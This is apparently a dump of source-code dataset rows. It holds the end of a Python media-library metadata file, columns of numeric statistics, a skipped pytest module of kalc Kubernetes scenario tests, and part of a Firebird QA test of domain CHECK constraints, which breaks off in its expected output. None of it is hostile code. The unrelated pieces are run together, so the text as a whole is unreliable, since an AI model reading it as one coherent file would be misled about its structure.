PhotoFlickrGroupTypeIdentifier$MLiPhotoFolderAlbumTypeIdentifier$MLiPhotoLastImportAlbumTypeIdentifier$MLiPhotoLastNMonthsAlbumTypeIdentifier$MLiPhotoLastViewedEventAlbumTypeIdentifier$MLiPhotoLibraryAlbumTypeIdentifier$MLiPhotoPhotoStreamAlbumTypeIdentifier$MLiPhotoPlacesAlbumTypeIdentifier$MLiPhotoPlacesCityAlbumTypeIdentifier$MLiPhotoPlacesCountryAlbumTypeIdentifier$MLiPhotoPlacesPointOfInterestAlbumTypeIdentifier$MLiPhotoPlacesProvinceAlbumTypeIdentifier$MLiPhotoRootGroupTypeIdentifier$MLiPhotoSlideShowAlbumTypeIdentifier$MLiPhotoSmartAlbumTypeIdentifier$MLiPhotoSubscribedAlbumTypeIdentifier$MLiTunesAudioBooksPlaylistTypeIdentifier$MLiTunesFolderPlaylistTypeIdentifier$MLiTunesGeniusPlaylistTypeIdentifier$MLiTunesMoviesPlaylistTypeIdentifier$MLiTunesMusicPlaylistTypeIdentifier$MLiTunesMusicVideosPlaylistTypeIdentifier$MLiTunesPlaylistTypeIdentifier$MLiTunesPodcastPlaylistTypeIdentifier$MLiTunesPurchasedPlaylistTypeIdentifier$MLiTunesRootGroupTypeIdentifier$MLiTunesSavedGeniusPlaylistTypeIdentifier$MLiTunesSmartPlaylistTypeIdentifier$MLiTunesTVShowsPlaylistTypeIdentifier$MLiTunesVideoPlaylistTypeIdentifier$MLiTunesiTunesUPlaylistTypeIdentifier$"""
enums = """$MLMediaSourceTypeAudio@1$MLMediaSourceTypeImage@2$MLMediaSourceTypeMovie@4$MLMediaTypeAudio@1$MLMediaTypeImage@2$MLMediaTypeMovie@4$"""
misc.update({})
expressions = {}
# END OF FILE
| 143.45
| 5,167
| 0.936738
| 225
| 5,738
| 23.888889
| 0.871111
| 0.001488
| 0.005953
| 0.005209
| 0.01414
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005711
| 0.023527
| 5,738
| 39
| 5,168
| 147.128205
| 0.953596
| 0.018648
| 0
| 0.555556
| 1
| 0.111111
| 0.940078
| 0.939189
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.111111
| 0.222222
| 0.555556
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
0b0464422e5e83a92b6fb4da4a2c75653c08211b
| 4,176
|
py
|
Python
|
tests/test_scenarios.py
|
KellyGriffin/kalc
|
9b78c4177ed9ffccbf1ecfbf9a7946286cd7c583
|
[
"Apache-2.0"
] | null | null | null |
tests/test_scenarios.py
|
KellyGriffin/kalc
|
9b78c4177ed9ffccbf1ecfbf9a7946286cd7c583
|
[
"Apache-2.0"
] | null | null | null |
tests/test_scenarios.py
|
KellyGriffin/kalc
|
9b78c4177ed9ffccbf1ecfbf9a7946286cd7c583
|
[
"Apache-2.0"
] | null | null | null |
from tests.libs_for_tests import *
import pytest
# Module-level mark: pytest skips every test in this file at collection
# time; the whole file is slated for removal (see TODO).
pytestmark = pytest.mark.skip # TODO DELETEME
# # @pytest.mark.skip(reason="temporary skip")
# def test_OptimisticRun_wo_cli():
# run_dir_wo_cli(TEST_CLUSTER_FOLDER, TEST_DAEMONSET)
# @pytest.mark.skip(reason="temporary skip")
# def test_OptimisticRun_cli_direct():
# run_cli_directly(TEST_CLUSTER_FOLDER, TEST_DAEMONSET)
# # @pytest.mark.skip(reason="temporary skip")
# def test_OptimisticRun_cli_invoke():
# run_cli_invoke(TEST_CLUSTER_FOLDER, TEST_DAEMONSET)
print("test_has_deployment_creates_daemonset__pods_evicted_pods_pending")
def test_1_step_1_wo_cli():
run_wo_cli(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DAEMONSET_HIGH)
def test_has_deployment_creates_daemonset__pods_evicted_pods_pending_wo_cli():
run_wo_cli(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DAEMONSET_HIGH)
@pytest.mark.debug(reason="temporary skip")
def test_has_deployment_creates_daemonset__pods_evicted_pods_pending_cli_direct():
run_cli_directly(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DAEMONSET_HIGH)
# @pytest.mark.skip(reason="temporary skip")
def test_has_deployment_creates_daemonset__pods_evicted_pods_pending_cli_invoke():
run_cli_invoke(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DAEMONSET_HIGH)
print("test_creates_deployment_but_insufficient_resource__pods_pending")
def test_creates_deployment_but_insufficient_resource__pods_pending_wo_cli():
run_wo_cli(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DEPLOYMENT_ZERO)
@pytest.mark.debug(reason="temporary skip")
def test_creates_deployment_but_insufficient_resource__pods_pending_cli_direct():
run_cli_directly(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DEPLOYMENT_ZERO)
# @pytest.mark.skip(reason="temporary skip")
def test_creates_deployment_but_insufficient_resource__pods_pending_cli_invoke():
run_cli_invoke(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DEPLOYMENT_ZERO)
print("test_creates_service_and_deployment_insufficient_resource__service_outage")
def test_creates_service_and_deployment_insufficient_resource__service_outage_wo_cli():
run_wo_cli(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DEPLOYMENT_ZERO_WITH_SERVICE)
@pytest.mark.debug(reason="temporary skip")
def test_creates_service_and_deployment_insufficient_resource__service_outageg_cli_direct():
run_cli_directly(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DEPLOYMENT_ZERO_WITH_SERVICE)
# @pytest.mark.skip(reason="temporary skip")
def test_creates_service_and_deployment_insufficient_resource__service_outage_cli_invoke():
run_cli_invoke(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DEPLOYMENT_ZERO_WITH_SERVICE)
print(" has_deployment_creates_deployment__pods_evicted_pods_pending")
logger.info("----- has_deployment_creates_deployment__pods_evicted_pods_pending:")
def test_has_deployment_creates_deployment__pods_evicted_pods_pending_wo_cli():
run_wo_cli(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DEPLOYMENT_HIGH)
@pytest.mark.skip(reason="temporary skip")
def test_has_deployment_creates_deployment__pods_evicted_pods_pending_cli_direct():
run_cli_directly(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DEPLOYMENT_HIGH)
# @pytest.mark.skip(reason="temporary skip")
def test_has_deployment_creates_deployment__pods_evicted_pods_pending_cli_invoke():
run_cli_invoke(DUMP1_S1_H_S2_Z_FREE_200,CHANGE_DEPLOYMENT_HIGH)
# print(" has_daemonset_creates_deployment__pods_pending_high_severity")
# #Customer has a DaemonSet, creates a Deployment with higher priority,
# # one of the pods for DaemonSet gets evicted => we detect a high-severity
# # issue (because DaemonSet only has 1 pod per node working)
# def test_has_daemonset_creates_deployment__pods_pending_high_severity_wo_cli():
# run_wo_cli(DUMP_S1_HIGH_PRIORITY_S2_ZERO_PRIORITY_WITH_DAEMONSET_ZERO, CHANGE_DEPLOYMENT_HIGH)
# @pytest.mark.skip(reason="temporary skip")
# def test_has_daemonset_creates_deployment__pods_pending_high_severity_cli_direct():
# run_cli_directly(DUMP_S1_HIGH_PRIORITY_S2_ZERO_PRIORITY_WITH_DAEMONSET_ZERO, CHANGE_DEPLOYMENT_HIGH)
# # @pytest.mark.skip(reason="temporary skip")
# def test_has_daemonset_creates_deployment__pods_pending_high_severity_cli_invoke():
# run_cli_invoke(DUMP_S1_HIGH_PRIORITY_S2_ZERO_PRIORITY_WITH_DAEMONSET_ZERO, CHANGE_DEPLOYMENT_HIGH)
| 56.432432
| 107
| 0.863266
| 629
| 4,176
| 5.065183
| 0.119237
| 0.041745
| 0.077527
| 0.089768
| 0.906466
| 0.869115
| 0.866918
| 0.866918
| 0.799121
| 0.724733
| 0
| 0.022319
| 0.066571
| 4,176
| 74
| 108
| 56.432432
| 0.795023
| 0.363745
| 0
| 0.131579
| 0
| 0
| 0.146286
| 0.122286
| 0
| 0
| 0
| 0.013514
| 0
| 1
| 0.342105
| false
| 0
| 0.052632
| 0
| 0.394737
| 0.105263
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9bf95b11799633edd4b4e983fef0b9720514d8cb
| 48,293
|
py
|
Python
|
tests/functional/gtcs/test_dsql_domain_07.py
|
FirebirdSQL/firebird-qa
|
96af2def7f905a06f178e2a80a2c8be4a4b44782
|
[
"MIT"
] | 1
|
2022-02-05T11:37:13.000Z
|
2022-02-05T11:37:13.000Z
|
tests/functional/gtcs/test_dsql_domain_07.py
|
FirebirdSQL/firebird-qa
|
96af2def7f905a06f178e2a80a2c8be4a4b44782
|
[
"MIT"
] | 1
|
2021-09-03T11:47:00.000Z
|
2021-09-03T12:42:10.000Z
|
tests/functional/gtcs/test_dsql_domain_07.py
|
FirebirdSQL/firebird-qa
|
96af2def7f905a06f178e2a80a2c8be4a4b44782
|
[
"MIT"
] | 1
|
2021-06-30T14:14:16.000Z
|
2021-06-30T14:14:16.000Z
|
#coding:utf-8
#
# id: functional.gtcs.dsql_domain_07
# title: GTCS/tests/DSQL_DOMAIN_07. Test CREATE / ALTER domain statement with ADD/DROP CONSTRAINT clauses, together and separately.
# decription:
# Original test see in:
# https://github.com/FirebirdSQL/fbtcs/blob/master/GTCS/tests/DSQL_DOMAIN_07.script
#
# NB: avoid usage of ISQL command 'SHOW DOMAIN' because of unstable output.
# We display info about domains using common VIEW based on RDB$FIELDS table.
# Columns with rdb$validation_source and rdb$default_source contain BLOB data thus we have to skip from showing their blob ID - see substitution.
#
# ::: NOTE :::
# Added domains with datatype that did appear only in FB 4.0: DECFLOAT and TIME[STAMP] WITH TIME ZONE. For this reason only FB 4.0+ can be tested.
#
# For each base datatype we:
# * create domain and set initial CHECK constraint;
# * alter domain in order to add new constraint. This must FAIL with message "Only one constraint allowed for a domain" (SQLSTATE = 42000)
# * alter domain with requirement ADD CONSTRAINT and DROP it.
# ##########
# ### NB ### Clause 'DROP CONSTRAINT' will be executed FIRST in this case, regardless where it is specified.
# ##########
# For this reason such statement must PASS.
#                    * alter domain and try to add a new CHECK constraint again. This should fail again with SQLSTATE=42000.
#
# Currently following datatypes are NOT checked:
# blob sub_type text not null;
#                        blob sub_type binary not null; // but test *does* check BLOB without sub_type specified
# long float not null;
# nchar not null;
# binary not null;
# varbinary not null;
#
# Checked on 4.0.0.1931.
#
# tracker_id:
# min_versions: ['4.0']
# versions: 4.0
# qmid: None
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 4.0
# resources: None
# Output substitutions: collapse runs of whitespace, and hide the volatile
# BLOB ids printed for rdb$validation_source / rdb$default_source (their
# numeric values differ between runs; the blob *content* lines that follow
# them are what the test actually compares).
substitutions_1 = [('[ \t]+', ' '), ('DM_FDEFAULT_BLOB_ID.*', ''), ('DM_FVALID_BLOB_ID.*', '')]
# No initialization DDL: every object is created inside the test script itself.
init_script_1 = """"""
# Test database fixture: SQL dialect 3, empty init script.
db_1 = db_factory(sql_dialect=3, init=init_script_1)
# ISQL script under test. For each base datatype it: creates a domain with an
# initial CHECK constraint; tries ADD CONSTRAINT (must fail: only one
# constraint per domain); issues ADD CONSTRAINT ... DROP CONSTRAINT in one
# statement (must pass — DROP is executed first regardless of clause order);
# then tries ADD again (must fail). Finally selects from v_test to show the
# surviving constraint of every domain.
test_script_1 = """
set list on;
create view v_test as
select
ff.rdb$field_name as dm_name
,ff.rdb$field_type as dm_type
,ff.rdb$field_sub_type as dm_subtype
,ff.rdb$field_length as dm_flen
,ff.rdb$field_scale as dm_fscale
,ff.rdb$field_precision as dm_fprec
,ff.rdb$character_set_id as dm_fcset
,ff.rdb$collation_id as dm_fcoll
,ff.rdb$character_length dm_fchrlen
,ff.rdb$null_flag as dm_fnull
,ff.rdb$validation_source as dm_fvalid_blob_id
,ff.rdb$default_source as dm_fdefault_blob_id
from rdb$fields ff
where
ff.rdb$system_flag is distinct from 1
and ff.rdb$field_name starting with upper( 'dom0' )
;
commit;
create domain dom06_01 as smallint check( value = 1 );
alter domain dom06_01 add constraint check( value = 2 ); -- must fail: "Only one constraint allowed for a domain"
alter domain dom06_01 add constraint check( value = 3 ) drop constraint; -- drop will run FIRST here! Statement must PASS!
alter domain dom06_01 add constraint check( value = 4 ); -- must fail
------------------------------------------------------------------------------------------------
create domain dom06_02 as int check( value = 1 );
alter domain dom06_02 add constraint check( value = 2 );
alter domain dom06_02 add constraint check( value = 3 ) drop constraint;
alter domain dom06_02 add constraint check( value = 4 );
------------------------------------------------------------------------------------------------
create domain dom06_03 as bigint check( value = 1 );
alter domain dom06_03 add constraint check( value = 2 );
alter domain dom06_03 add constraint check( value = 3 ) drop constraint;
alter domain dom06_03 add constraint check( value = 4 );
------------------------------------------------------------------------------------------------
create domain dom06_04 as date check( value <= current_date );
alter domain dom06_04 add constraint check( value = current_date );
alter domain dom06_04 add constraint check( value < current_date ) drop constraint;
alter domain dom06_04 add constraint check( value > current_date );
------------------------------------------------------------------------------------------------
create domain dom06_05 as time check( value <= current_time );
alter domain dom06_05 add constraint check( value = current_time );
alter domain dom06_05 add constraint check( value < current_time ) drop constraint;
alter domain dom06_05 add constraint check( value > current_time );
------------------------------------------------------------------------------------------------
create domain dom06_06 as time with time zone check( value >= '11:11:11.111 Indian/Cocos');
alter domain dom06_06 add constraint check( value >= '12:31:42.543 Pacific/Fiji' );
alter domain dom06_06 add constraint check( value < '23:34:45.678 Pacific/Galapagos' ) drop constraint;
alter domain dom06_06 add constraint check( value > '01:02:03.456 Antarctica/South_Pole' );
------------------------------------------------------------------------------------------------
create domain dom06_07 as time check( value <= current_timestamp );
alter domain dom06_07 add constraint check( value = current_timestamp );
alter domain dom06_07 add constraint check( value < current_timestamp ) drop constraint;
alter domain dom06_07 add constraint check( value > current_timestamp );
------------------------------------------------------------------------------------------------
create domain dom06_08 as timestamp with time zone check( value >= '21.12.2013 11:11:11.111 Indian/Cocos' );
alter domain dom06_08 add constraint check( value >= '23.01.2014 12:31:42.543 Pacific/Fiji' );
alter domain dom06_08 add constraint check( value < '27.03.2015 23:34:45.678 Pacific/Galapagos' ) drop constraint;
alter domain dom06_08 add constraint check( value > '29.05.2017 01:02:03.456 Antarctica/South_Pole' );
------------------------------------------------------------------------------------------------
create domain dom06_09 as char(1) character set utf8 check( value = '€');
alter domain dom06_09 add constraint check( value = '£' );
alter domain dom06_09 add constraint check( value = '¢' ) drop constraint;
alter domain dom06_09 add constraint check( value = '¥' );
------------------------------------------------------------------------------------------------
create domain dom06_10 as varchar(1) character set utf8 check( value = '€');
alter domain dom06_10 add constraint check( value = '£' );
alter domain dom06_10 add constraint check( value = '¢' ) drop constraint;
alter domain dom06_10 add constraint check( value = '¥' );
------------------------------------------------------------------------------------------------
create domain dom06_11 as nchar(1) check( value = 'Ž'); -- ISO8859_1
alter domain dom06_11 add constraint check( value = 'š' );
alter domain dom06_11 add constraint check( value = 'Ÿ' ) drop constraint;
alter domain dom06_11 add constraint check( value = '¡' );
------------------------------------------------------------------------------------------------
create domain dom06_12 as numeric(2,2) check(value = -327.68);
alter domain dom06_12 add constraint check( value = 327.67 );
alter domain dom06_12 add constraint check( value = -327.68 ) drop constraint;
alter domain dom06_12 add constraint check( value = 327.67 );
------------------------------------------------------------------------------------------------
create domain dom06_13 as decimal(2,2) check(value = -327.68);
alter domain dom06_13 add constraint check( value = 327.67 );
alter domain dom06_13 add constraint check( value = -327.68 ) drop constraint;
alter domain dom06_13 add constraint check( value = 327.67 );
------------------------------------------------------------------------------------------------
create domain dom06_14 as float check(value < 340282346638528859811704183484516925440);
alter domain dom06_14 add constraint check( value = 327.67 );
alter domain dom06_14 add constraint check( value = 1.40129846432481707092372958328991613128026194187651577175706828388979108268586060148663818836212158203125e-45 ) drop constraint;
alter domain dom06_14 add constraint check( value = 0.999999940395355224609375 );
------------------------------------------------------------------------------------------------
create domain dom06_15 as float check(value < 340282346638528859811704183484516925440);
alter domain dom06_15 add constraint check( value = 327.67 );
alter domain dom06_15 add constraint check( value = 1.40129846432481707092372958328991613128026194187651577175706828388979108268586060148663818836212158203125e-45 ) drop constraint;
alter domain dom06_15 add constraint check( value = 0.999999940395355224609375 );
------------------------------------------------------------------------------------------------
create domain dom06_16 as double precision check(value < 1.797693134862315708e308);
alter domain dom06_16 add constraint check( value = 327.67 );
alter domain dom06_16 add constraint check( value >= 2e-308 ) drop constraint;
alter domain dom06_16 add constraint check( value = 1.0000000000000002220446049250313080847263336181640625 );
-----------------------------------------------------------------------------------------------
create domain dom06_17 as blob check (value =
'
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
0123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789
012345678901234567
'
);
alter domain dom06_17 add constraint check( value =
'
'); -- several empty lines here
alter domain dom06_17 add constraint check( value =
'
') drop constraint;
alter domain dom06_17 add constraint check( value is not null );
----------------------------------------------------------------------------------------------------
create domain dom06_18 as boolean check( value = false);
alter domain dom06_18 add constraint check( value = true );
alter domain dom06_18 add constraint check( value is not null ) drop constraint;
alter domain dom06_18 add constraint check( value = false );
----------------------------------------------------------------------------------------------------
create domain dom06_19 as decfloat check( value >= -9.999999999999999999999999999999999E6144 );
alter domain dom06_19 add constraint check( value <= 9.999999999999999999999999999999999E6144 );
alter domain dom06_19 add constraint check( value is not null ) drop constraint;
alter domain dom06_19 add constraint check( value >= -1.0E-6143 );
----------------------------------------------------------------------------------------------------
commit;
set count on;
select * from v_test;
"""
# Action fixture: runs test_script_1 via ISQL against db_1, applying substitutions_1 to the output.
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
# Expected STDOUT: one v_test record per domain (19 in total); the blob-id
# lines are masked by substitutions_1, leaving only the constraint text.
expected_stdout_1 = """
DM_NAME DOM06_01
DM_TYPE 7
DM_SUBTYPE 0
DM_FLEN 2
DM_FSCALE 0
DM_FPREC 0
DM_FCSET <null>
DM_FCOLL <null>
DM_FCHRLEN <null>
DM_FNULL <null>
DM_FVALID_BLOB_ID 2:1e6
check( value = 3 )
DM_FDEFAULT_BLOB_ID <null>
DM_NAME DOM06_02
DM_TYPE 8
DM_SUBTYPE 0
DM_FLEN 4
